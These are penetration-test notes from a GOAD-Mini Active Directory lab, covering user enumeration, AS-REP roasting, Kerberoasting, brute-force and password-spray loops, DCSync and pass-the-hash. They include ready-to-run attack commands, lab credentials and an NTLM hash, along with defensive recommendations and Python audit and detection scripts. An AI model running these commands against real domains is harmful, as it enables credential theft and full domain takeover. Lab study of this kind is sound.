# Active Directory Penetration Testing — Complete Notes

### Based on GOAD-Mini Lab Assessment

---

## Table of Contents

1. [Lab Environment](#lab-environment)
2. [Methodology Overview](#methodology-overview)
3. [Tools Used](#tools-used)
4. [Phase 1 — Reconnaissance & Network Discovery](#phase-1--reconnaissance--network-discovery)
5. [Phase 2 — Service Enumeration (SMB)](#phase-2--service-enumeration-smb)
6. [Phase 3 — User Enumeration](#phase-3--user-enumeration)
7. [Phase 4 — Password Discovery & Credential Acquisition](#phase-4--password-discovery--credential-acquisition)
8. [Phase 4.5 — Authenticated AD Enumeration](#phase-45--authenticated-ad-enumeration)
9. [Phase 5 — Advanced Exploitation](#phase-5--advanced-exploitation)
10. [Vulnerabilities Found](#vulnerabilities-found)
11. [Defensive Recommendations](#defensive-recommendations)
12. [Key Takeaways](#key-takeaways)

---

## Lab Environment

| Component | Detail |
|---|---|
| Hostname | KINGSLANDING |
| Domain | SEVENKINGDOMS / sevenkingdoms.local |
| Domain SID | S-1-5-21-3262952663-1425775882-330886615 |
| IP Address | 192.168.56.10 |
| OS | Windows Server 2019 |
| Role | Domain Controller (AD DS + DNS) |
| Attacker OS | Linux (Kali/Debian) |
| Network | Host-only (192.168.56.0/24) |

---

## Methodology Overview

```
1. Reconnaissance       → Network discovery, port scanning
2. Enumeration          → SMB, LDAP, user & group discovery
3. Credential Discovery → Password attacks, reuse testing
4. Exploitation         → AS-REP Roasting, Kerberoasting, DCSync
5. Post-Exploitation    → Lateral movement preparation
```

---

## Tools Used

| Category | Tools |
|---|---|
| Network Scanning | Nmap, Nmap NSE scripts |
| SMB Enumeration | Enum4linux, Enum4linux-ng, rpcclient, smbclient |
| LDAP Enumeration | ldapsearch, ldapdomaindump |
| Kerberos Attacks | Kerbrute, Impacket GetNPUsers, GetUserSPNs |
| Password Cracking | hashcat (modes 18200, 13100) |
| Brute Force | Hydra (limited), custom bash scripts, CrackMapExec/NetExec |
| Exploitation | Impacket secretsdump |
| Post-Exploit | crackmapexec, rpcclient |

---

## Phase 1 — Reconnaissance & Network Discovery

### Command

```bash
nmap -sV -sC -p- --min-rate 1000 192.168.56.10
```

### Key Findings

- **14 open ports** — confirmed full AD domain controller
- **Standard AD ports** all open (Kerberos 88, LDAP 389, SMB 445, etc.)
- **Port 80 (HTTP)** open — extra attack surface
- **WinRM ports 5985/5986** open — remote management accessible
- **Both LDAP (389) and LDAPS (636)** available, plus Global Catalog (3268/3269)

### Domain Info Revealed by Nmap

```
Domain:   sevenkingdoms.local
Site:     Default-First-Site-Name
Hostname: kingslanding.sevenkingdoms.local
```

### SSL Certificate (from LDAPS scan)

```
Subject:    commonName=kingslanding.sevenkingdoms.local
Valid From: 2026-01-24
Valid To:   2027-01-24
SAN:        DNS:kingslanding.sevenkingdoms.local
```

---

## Phase 2 — Service Enumeration (SMB)

### Enum4linux

```bash
enum4linux -a 192.168.56.10
```

**Findings:**

- Domain: SEVENKINGDOMS
- NetBIOS Name: KINGSLANDING
- MAC: 08:00:27:cd:d4:fb (VirtualBox NIC)
- ⚠️ **Anonymous sessions: ALLOWED** (username '', password '')
- ✅ SMB signing: Enabled and Required (protects against MITM/relay attacks)

### Enum4linux-ng (Advanced)

```bash
enum4linux-ng -A -oJ enum4linux-ng.json 192.168.56.10
```

Provides: share enumeration, user/group enumeration, password policy info.
### Nmap SMB Scripts

```bash
nmap --script=smb* 192.168.56.10
```

Key scripts: `smb-enum-shares`, `smb-enum-users`, `smb-os-discovery`, `smb-security-mode`, `smb-vuln-*`

> ✅ **SMB signing confirmed required** — good security control, prevents relay attacks.
> ⚠️ **Anonymous sessions allowed** — information disclosure risk.

---

## Phase 3 — User Enumeration

### Technique 1: Kerbrute (Most Effective)

```bash
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt
```

**How it works:**

- Valid username → `KDC_ERR_PREAUTH_REQUIRED` (user exists, needs password)
- Invalid username → `KDC_ERR_C_PRINCIPAL_UNKNOWN` (not found)

**Advantages:** Fast, no auth needed, low detection risk, bypasses anonymous restrictions.

---

### Technique 2: AS-REP Roasting for User Discovery

```bash
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile userlist.txt -format hashcat
```

**Dual benefit:** Discovers valid usernames AND identifies vulnerable accounts simultaneously.

**Output messages explained:**

| Message | Meaning |
|---|---|
| `UF_DONT_REQUIRE_PREAUTH not set` | User exists but pre-auth is ON — not roastable |
| `KDC_ERR_C_PRINCIPAL_UNKNOWN` | Username doesn't exist |
| `KDC_ERR_CLIENT_REVOKED` | Account disabled/locked |
| `$krb5asrep$23$user@DOMAIN:...` | ✅ Hash captured — account is AS-REP roastable! |

---

### Technique 3: SMB/RPC Enumeration

```bash
enum4linux -U 192.168.56.10

# Null session; -c runs the enumdomusers command instead of an interactive prompt
rpcclient -U "" -N 192.168.56.10 -c "enumdomusers"
```

Less reliable; often needs authentication.

### Technique 4: LDAP Anonymous Query

```bash
ldapsearch -x -H "ldap://192.168.56.10" -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" sAMAccountName
```

Typically fails on properly configured AD (auth required — and in this lab it was blocked ✅).
---

### Discovered Users (27 total)

| Account | Type | Notes |
|---|---|---|
| Administrator | Admin | High-value target |
| TestAdmin | Admin | Test account |
| DCSyncUser | Privileged | High-value target |
| krbtgt | System | Critical — used in Golden Ticket attacks |
| KINGSLANDING$ | Computer | DC computer account |
| ASREPUser1 | Test | Pre-auth DISABLED — roastable |
| ASREPUser2 | Test | Pre-auth DISABLED — roastable |
| SprayUser1, SprayUser2 | Test | Intended for spray testing |
| TestUser | Test | Pre-auth disabled; Password: `Password123!` |
| ExchangeService | Service | Has SPN — Kerberoastable |
| FileService | Service | Has SPN — Kerberoastable |
| SQLService | Service | Has SPN — Kerberoastable |
| WebService | Service | Has SPN — Kerberoastable |
| cersei.lannister, jaime.lannister, joffrey.baratheon, etc. | Users | GoT-themed GOAD accounts |
| Guest | Built-in | Usually disabled |
| vagrant | Lab | Vagrant deployment account |

---

## Phase 4 — Password Discovery & Credential Acquisition

### Step 1: AS-REP Roasting (No Auth Needed)

```bash
# Get hashes
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 \
    -usersfile userlist.txt -format hashcat -outputfile asrep_hashes.txt

# Crack hashes (mode 18200)
hashcat -m 18200 -a 0 asrep_hashes.txt ./passlist.txt
```

**Cracked:**

- `TestUser:Password123!`
- `ASREPUser1:Password123!`
- `ASREPUser2:Password123!`

---

### Step 2: Kerberoasting (Needs 1 Valid Account)

```bash
# Request service tickets
GetUserSPNs.py -dc-ip 192.168.56.10 \
    sevenkingdoms.local/TestUser:Password123! \
    -request -outputfile kerberoast_hashes.txt

# Crack hashes (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
```

**Targets:** ExchangeService, FileService, SQLService, WebService (all had SPNs)

**Result:** All cracked with `Password123!`

---

### Step 3: SMB Brute Force

#### Why Hydra/Medusa FAIL on modern Windows Server 2019:

- SMB signing required — these tools don't handle it
- SMB 1.0/2.0 only — Server 2019 uses SMB 3.x
- Auth handshake mismatches

#### Working approach — custom bash script:

```bash
# Read the lists line by line so passwords with spaces or glob characters survive.
# smbclient gets </dev/null so it cannot consume lines from the loop's stdin.
while IFS= read -r user; do
    while IFS= read -r password; do
        if smbclient -L 192.168.56.10 -U "$user%$password" -N </dev/null >/dev/null 2>&1; then
            echo "VALID: $user:$password" >> valid_credentials.txt
        fi
    done < passlist.txt
done < users.txt
```

#### CrackMapExec / NetExec (Recommended):

```bash
crackmapexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success

# OR newer:
netexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
```

Better lockout detection, faster, modern SMB support.

---

### Step 4: Password Spraying (Low Lockout Risk)

```bash
# Outer loop over passwords, inner loop over users: one attempt per user per password
while IFS= read -r password; do
    while IFS= read -r user; do
        if smbclient -L 192.168.56.10 -U "$user%$password" -N </dev/null >/dev/null 2>&1; then
            echo "[+] VALID: $user:$password"
        fi
        sleep 2  # avoid lockouts
    done < users.txt
done < spray_passwords.txt
```

---

### Account Lockout Awareness

| Setting | Windows Default |
|---|---|
| Lockout threshold | 5 failed attempts |
| Lockout duration | 30 minutes |
| Counter reset | 30 minutes |

**Best practices:**

- Use `sleep 2` between attempts
- Use password spraying (few passwords × many users) over brute force
- Monitor for lockout error messages
- Prioritize service accounts first, avoid Administrator initially

---

### Credential Discovery Results

| Account | Password | How Found |
|---|---|---|
| TestUser | Password123! | AS-REP Roasting |
| ASREPUser1 | Password123! | AS-REP Roasting |
| ASREPUser2 | Password123! | AS-REP Roasting |
| ExchangeService | Password123! | Kerberoasting |
| FileService | Password123! | Kerberoasting |
| SQLService | Password123! | Kerberoasting |
| WebService | Password123! | Kerberoasting |
| **Administrator** | **8dCT-DJjgScp** | **Dictionary brute force** |

---

### Password Reuse Testing

```bash
found_password="8dCT-DJjgScp"
while IFS= read -r user; do
    if smbclient -L 192.168.56.10 -U "$user%$found_password" -N </dev/null >/dev/null 2>&1; then
        echo "REUSE: $user:$found_password"
    fi
done < users.txt
```

---

## Phase 4.5 — Authenticated AD Enumeration

Once `Administrator:8dCT-DJjgScp` was obtained, full authenticated enumeration was performed.

### LDAP Queries

#### Users:

```bash
ldapsearch -x -H "ldap://192.168.56.10" \
    -D "Administrator@sevenkingdoms.local" -w "8dCT-DJjgScp" \
    -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" \
    sAMAccountName userPrincipalName description
```

#### Groups:

```bash
# Same connection and bind options (-x -H -D -w -b) as the users query
ldapsearch ... "(objectClass=group)" cn member memberOf
```

#### Computers:

```bash
ldapsearch ... "(objectClass=computer)" name operatingSystem lastLogon
```

#### OUs:

```bash
ldapsearch ... "(objectClass=organizationalUnit)" ou description
```

### Full Domain Dump

```bash
ldapdomaindump -u "SEVENKINGDOMS\\Administrator" -p "8dCT-DJjgScp" \
    192.168.56.10 -o ldap_dump/
```

**Output files:** `domain_users.json`, `domain_groups.json`, `domain_computers.json`, `domain_ous.json`, `domain_policy.json`

---

## Phase 5 — Advanced Exploitation

### DCSync Attack

```bash
secretsdump.py -dc-ip 192.168.56.10 \
    sevenkingdoms.local/Administrator:8dCT-DJjgScp@192.168.56.10 \
    -just-dc
```

**What it extracts:**

- NTLM hashes for ALL domain accounts
- LM hashes (if enabled)
- Kerberos AES keys
- **krbtgt hash** → enables Golden Ticket attacks

**Why it's catastrophic:** Single command = complete domain credential dump.
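The same `domain_users.json` dump is a useful defensive audit input: the findings from Phase 3 (pre-auth disabled) and Phase 4 (user accounts carrying SPNs) are both visible in `userAccountControl` and `servicePrincipalName`. The audit below is an added example, not part of the original notes or of ldapdomaindump; it assumes the dump is a JSON list of entries, each with an `attributes` dict of list-valued attributes, and the sample data embedded in it is constructed.

```python
import json

# userAccountControl bits (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQ_PREAUTH = 0x400000

# Constructed sample in the layout assumed for ldapdomaindump's domain_users.json
# (a list of entries, each with an "attributes" dict of list-valued attributes).
SAMPLE_USERS_JSON = json.dumps([
    {"dn": "CN=TestUser,CN=Users,DC=sevenkingdoms,DC=local",
     "attributes": {"sAMAccountName": ["TestUser"], "userAccountControl": [4194816],
                    "servicePrincipalName": []}},
    {"dn": "CN=SQLService,CN=Users,DC=sevenkingdoms,DC=local",
     "attributes": {"sAMAccountName": ["SQLService"], "userAccountControl": [66048],
                    "servicePrincipalName": ["MSSQLSvc/kingslanding.sevenkingdoms.local:1433"]}},
    {"dn": "CN=krbtgt,CN=Users,DC=sevenkingdoms,DC=local",
     "attributes": {"sAMAccountName": ["krbtgt"], "userAccountControl": [514],
                    "servicePrincipalName": ["kadmin/changepw"]}},
    {"dn": "CN=cersei.lannister,CN=Users,DC=sevenkingdoms,DC=local",
     "attributes": {"sAMAccountName": ["cersei.lannister"], "userAccountControl": [512],
                    "servicePrincipalName": []}},
])

def _first(attrs, name, default=None):
    """Return the single value of a list-valued LDAP attribute (or the scalar itself)."""
    value = attrs.get(name, default)
    if isinstance(value, list):
        return value[0] if value else default
    return value

def audit_users(users_json):
    """Return {sAMAccountName: [finding, ...]} for enabled accounts that need attention."""
    findings = {}
    for entry in json.loads(users_json):
        attrs = entry.get("attributes", {})
        name = _first(attrs, "sAMAccountName", "")
        uac = int(_first(attrs, "userAccountControl", 0) or 0)
        spns = attrs.get("servicePrincipalName") or []
        if uac & UF_ACCOUNTDISABLE or name == "krbtgt" or name.endswith("$"):
            continue  # disabled accounts, the KDC account and machine accounts are out of scope
        issues = []
        if uac & UF_DONT_REQ_PREAUTH:
            issues.append("AS-REP roastable: DONT_REQ_PREAUTH set")
        if spns:
            issues.append("Kerberoastable: %d SPN(s) on a user account" % len(spns))
            if uac & UF_DONT_EXPIRE_PASSWD:
                issues.append("service password never expires: migrate to gMSA")
        if issues:
            findings[name] = issues
    return findings
```

Run it against the real dump with `audit_users(open("ldap_dump/domain_users.json").read())`; every hit maps to recommendation 2 or 5 in the Defensive Recommendations below.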
**Required permissions for DCSync:**

- Domain Admin, OR
- "Replicating Directory Changes", OR
- "Replicating Directory Changes All" rights

---

### Authenticated SMB Enumeration (Pass-the-Hash)

```bash
crackmapexec smb 192.168.56.10 \
    -u Administrator \
    -H c66d72021a2d4744409969a581a1705e \
    --shares
```

### RPC Enumeration (Authenticated)

```bash
# -c runs the command non-interactively (a bare ">" would redirect output to a file)
rpcclient -U "Administrator%8dCT-DJjgScp" 192.168.56.10 -c "enumdomusers"
```

---

## Vulnerabilities Found

### Critical

| ID | Finding | Impact |
|---|---|---|
| F-01 | Weak Domain Admin password (`8dCT-DJjgScp`) | Immediate full domain control |
| F-02 | Excessive privileges enabled DCSync | All domain credentials extracted in one operation |

### High

| ID | Finding | Impact |
|---|---|---|
| F-03 | AS-REP Roastable accounts (ASREPUser1, ASREPUser2) | Offline cracking without authentication |
| F-04 | Kerberoastable service accounts with weak passwords | Service account takeover, lateral movement |

### Medium

| ID | Finding | Impact |
|---|---|---|
| F-05 | Partial anonymous SMB sessions allowed | Unauthenticated info gathering |
| F-06 | HTTP (port 80) open on DC | Extra attack surface, potential info leak |

### Positive Controls Observed ✅

| ID | Control | Value |
|---|---|---|
| P-01 | SMB signing required | Prevents relay/MITM attacks |
| P-02 | Anonymous LDAP bind disabled | Prevents unauthenticated directory scraping |

---

## Defensive Recommendations

### Immediate (High Priority)

1. **Eliminate weak/default credentials**
   - Reset Administrator and all service accounts
   - Use unique passwords — no sharing across accounts
   - Store privileged credentials in a vault
2. **Fix Kerberos pre-auth misconfigurations**
   - Enable pre-authentication on ALL user accounts
   - Audit for the `DONT_REQ_PREAUTH` flag regularly
   - Alert on changes to this flag
3. **Strengthen password policy**
   - Minimum 14+ characters (higher for privileged/service accounts)
   - Enforce complexity or use long passphrases
   - Enable password history + minimum age
   - Implement MFA for administrative access

### Long-Term (Strategic)

4. **Privileged Access Management (PAM)**
   - JIT (Just-In-Time) privilege elevation
   - Privileged Access Workstations (PAWs)
   - Regular access reviews; reduce Domain Admin members
5. **Service Account Hardening**
   - Migrate to **gMSA** (Group Managed Service Accounts) — auto-rotating passwords
   - Deny interactive logon for service accounts
   - Constrain delegation
   - Reduce SPN exposure
6. **Reduce DC Attack Surface**
   - Remove non-essential services (e.g., no HTTP on DCs)
   - Role separation — no extra workloads on DCs
7. **Network Segmentation**
   - Isolate DCs from user subnets
   - Firewall/ACL for SMB (445), WinRM (5985/5986), LDAP (389/636), Kerberos (88)
8. **LAPS — Local Admin Password Solution**
   - Randomize local admin passwords per machine
   - Prevent lateral movement via password reuse

### Monitoring & Detection

9. **Enable Advanced Auditing** for:
   - Account Logon (success + failure)
   - Logon/Logoff (success + failure)
   - Account Management
   - Directory Service Access
   - Privilege Use
   - Policy Change
10. **Alert on these AD attack patterns:**
    - Unusual Kerberos auth failures (enumeration/spraying)
    - Spike in TGS requests to SPNs → Kerberoasting
    - DC replication operations from non-DC hosts → DCSync
    - Excessive failed logons across many users → password spray
    - Privileged group membership changes
    - Unexpected admin logons
11. **Protected Users Group** — add high-value accounts to prevent credential caching, Kerberos delegation abuse, etc.
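Three of the patterns in recommendation 10 can be expressed as simple rules over Windows Security events: Kerberoasting shows up as many RC4 (`0x17`) service-ticket requests (event 4769) for user-account SPNs from one source, DCSync as event 4662 carrying the DS-Replication-Get-Changes GUIDs for a principal that is not a DC, and spraying as bad-password pre-auth failures (event 4771, status `0x18`) across many users from one source. The detector below is an added example, not part of the original notes or of any SIEM product; the event records are a constructed subset of the real log fields, and the thresholds and the `DC_ACCOUNTS` set (the lab's KINGSLANDING$ account) are assumptions to tune for a real environment.

```python
from collections import defaultdict

# Control-access GUIDs a DCSync needs (they appear in the Properties field of event 4662)
REPLICATION_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")   # DS-Replication-Get-Changes-All
DC_ACCOUNTS = {"KINGSLANDING$"}   # assumed: the only principals expected to replicate
RC4_TGS_THRESHOLD = 4             # distinct user-account SPNs requested with RC4 from one source
SPRAY_THRESHOLD = 3               # distinct users with bad-password failures from one source

# Constructed sample events with a subset of Security-log fields; not real lab output
SAMPLE_EVENTS = [
    *({"id": 4769, "src": "192.168.56.1", "user": "TestUser", "svc": s, "etype": "0x17"}
      for s in ("SQLService", "WebService", "FileService", "ExchangeService")),
    {"id": 4769, "src": "192.168.56.20", "user": "cersei.lannister", "svc": "KINGSLANDING$", "etype": "0x12"},
    {"id": 4662, "user": "Administrator", "props": "%%7688 " + REPLICATION_GUIDS[1]},
    {"id": 4662, "user": "KINGSLANDING$", "props": "%%7688 " + REPLICATION_GUIDS[0]},
    *({"id": 4771, "src": "192.168.56.1", "user": u, "status": "0x18"}
      for u in ("SprayUser1", "SprayUser2", "jaime.lannister")),
    {"id": 4771, "src": "192.168.56.20", "user": "joffrey.baratheon", "status": "0x18"},
]

def detect(events):
    """Return a list of (rule, subject) alerts for the Kerberoast, DCSync and spray patterns."""
    rc4_tgs = defaultdict(set)       # src -> service accounts requested with RC4
    failed_users = defaultdict(set)  # src -> users with bad-password pre-auth failures
    alerts = []
    for e in events:
        if e["id"] == 4769 and e["etype"] == "0x17" and not e["svc"].endswith("$") and e["svc"] != "krbtgt":
            rc4_tgs[e["src"]].add(e["svc"])   # RC4 tickets for user-account SPNs: Kerberoast signature
        elif e["id"] == 4662 and any(g in e["props"] for g in REPLICATION_GUIDS):
            if e["user"] not in DC_ACCOUNTS:  # replication rights exercised by a non-DC principal
                alerts.append(("dcsync", e["user"]))
        elif e["id"] == 4771 and e["status"] == "0x18":
            failed_users[e["src"]].add(e["user"])
    alerts += [("kerberoast", src) for src, svcs in rc4_tgs.items() if len(svcs) >= RC4_TGS_THRESHOLD]
    alerts += [("password_spray", src) for src, users in failed_users.items() if len(users) >= SPRAY_THRESHOLD]
    return alerts

if __name__ == "__main__":
    for rule, subject in detect(SAMPLE_EVENTS):
        print("ALERT %-15s %s" % (rule, subject))
```

Machine-account and krbtgt service tickets are excluded from the RC4 count because those are routine; in a real deployment the sets should also be bucketed by time window.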
---

## Key Takeaways

### Attack Side

- **Enumeration is decisive** — thorough recon directly enables all downstream attacks
- **One weak privileged credential collapses the entire domain** — even with good controls elsewhere
- **Service accounts are high-value targets** — SPNs + weak passwords = easy offline cracking
- **Password reuse is a force multiplier** — one cracked password can open many accounts
- **AS-REP Roasting is free** — no credentials needed, purely passive from the network

### Defense Side

- **Network controls alone are not enough** — credential hygiene is non-negotiable
- **Many AD attacks are detectable** — proper auditing + centralized logging + alerting
- **Least privilege matters** — smaller blast radius if one account is compromised
- **gMSA for service accounts** — removes the human password hygiene problem entirely
- **Clock sync (NTP) is critical for Kerberos** — drift > 5 min causes `KRB_AP_ERR_SKEW` and breaks auth

---

## Quick Reference: Hash Cracking Modes

| Attack | Hash Prefix | Hashcat Mode |
|---|---|---|
| AS-REP Roasting | `$krb5asrep$23$` | 18200 |
| Kerberoasting | `$krb5tgs$23$` | 13100 |
| NTLM | (no prefix) | 1000 |

---

## Quick Reference: Key Commands

```bash
# Kerbrute user enum
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt

# AS-REP Roasting
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile users.txt -format hashcat -outputfile asrep.txt

# Kerberoasting
GetUserSPNs.py -dc-ip 192.168.56.10 sevenkingdoms.local/user:pass -request -outputfile kerb.txt

# Full domain dump
ldapdomaindump -u "DOMAIN\\user" -p "pass" 192.168.56.10 -o ldap_dump/

# DCSync
secretsdump.py -dc-ip 192.168.56.10 sevenkingdoms.local/Administrator:pass@192.168.56.10 -just-dc

# Crack AS-REP
hashcat -m 18200 -a 0 asrep.txt wordlist.txt

# Crack Kerberoast
hashcat -m 13100 kerb.txt wordlist.txt
```
